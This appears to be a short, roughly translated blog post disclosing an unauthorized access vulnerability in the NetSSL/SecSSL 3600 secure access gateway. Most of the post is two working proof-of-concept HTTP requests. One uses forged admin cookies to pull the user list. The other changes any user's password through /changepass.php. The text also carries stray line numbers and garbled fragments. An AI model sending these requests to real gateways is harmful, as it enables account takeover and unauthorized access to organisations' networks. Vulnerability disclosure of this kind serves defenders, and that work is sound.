Netssl 3600 Secure Access Gateway System Unauthorized Access Vulnerability
Netssl 3600 Secure Access Gateway System Unauthorized Access Vulnerability
#Net God SecSSL 3600 Secure Access Gateway System Unauthorized Access Vulnerability
Vulnerability Description
NetSSL 3600 secure access gateway system There is an unauthorized access vulnerability. The attacker can obtain the user list and modify the user account password through the vulnerability.
Vulnerability Impact
Net God SecSSL 3600 Secure Access Gateway System
Network surveying and mapping
Vulnerability reappears
Login page
Verify POC and get user list zkec
1
2
3
GET /admin/group/x_group.php?id=2
Cookie: admin_id=1; gw_admin_ticket=1;
Modify user password
1
2
3
4
POST /changepass.php?type=2
Cookie: admin_id=1; gw_user_ticket=ffffffffffffffffffffffffffffffff; last_step_param={"this_name":"ceshi","subAuthId":"1"}
old_pass=&password=Asd123!@#123A&repassword=Asd123!@#123A
This post is licensed under CC BY 4.0 by the author.